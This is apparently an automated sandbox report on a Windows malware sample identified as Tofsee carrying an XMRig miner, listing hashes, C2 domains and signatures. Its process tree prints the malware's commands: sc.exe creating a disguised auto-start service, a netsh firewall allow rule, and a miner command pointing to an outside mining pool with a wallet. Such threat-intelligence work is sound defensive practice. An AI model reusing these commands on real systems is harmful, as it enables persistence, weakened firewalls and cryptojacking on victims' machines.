Analysis
-
max time kernel
5s -
max time network
162s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
19/11/2023, 23:50
Static task
static1
Behavioral task
behavioral1
Sample
7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
Resource
win10v2004-20231023-en
General
-
Target
7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
-
Size
254KB
-
MD5
02ac11d7691ed7141949fc5c03d5aae8
-
SHA1
b122e23b4dfb29d4efedbbe7a72c75d696f8a7ac
-
SHA256
7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee
-
SHA512
c437f0cec3cbe5a62a650cafd0814016864c083a2df5a65000d0411b8249daec0744b7c948039a97848135a263ba183a9cb00876fbc3d22ee1e8322dfda0e55e
-
SSDEEP
3072:M9xGAh803FPqB1HzqotaoQpxVKPk4hjw6EX7eUkpvTRSdnbr4rO/p/4CY/:w/8iYlAxVKMuELrdnbr4yG
Malware Config
Extracted
tofsee
vanaheim.cn
jotunheim.name
Signatures
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/1276-63-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-72-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-77-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-76-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-75-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-74-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-73-0x0000000000260000-0x0000000000351000-memory.dmp xmrig behavioral1/memory/1276-71-0x0000000000260000-0x0000000000351000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2732 netsh.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2740 sc.exe 2816 sc.exe 2744 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2216 wrote to memory of 2324 2216 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe 29 PID 2216 wrote to memory of 2324 2216 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe 29 PID 2216 wrote to memory of 2324 2216 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe 29 PID 2216 wrote to memory of 2324 2216 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\2⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\2⤵PID:2344
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
- Launches sc.exe
PID:2740
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"2⤵
- Launches sc.exe
PID:2816
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start permvqxi2⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
- Modifies Windows Firewall
PID:2732
-
-
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exeC:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"1⤵PID:2760
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:2764
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 13⤵PID:1276
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.9MB
MD541e5c245a82a8504a70527e839ae883e
SHA1080f8d3a98ac6769752e221403d17354a4afa0b5
SHA25651fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746
SHA512b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69
-
Filesize
5.4MB
MD59bbc5d1f6be289e2071874e4a8e1815a
SHA1362815bd2e08ecca3f49caa89dc21b2fbd104dcf
SHA256c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847
SHA512fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525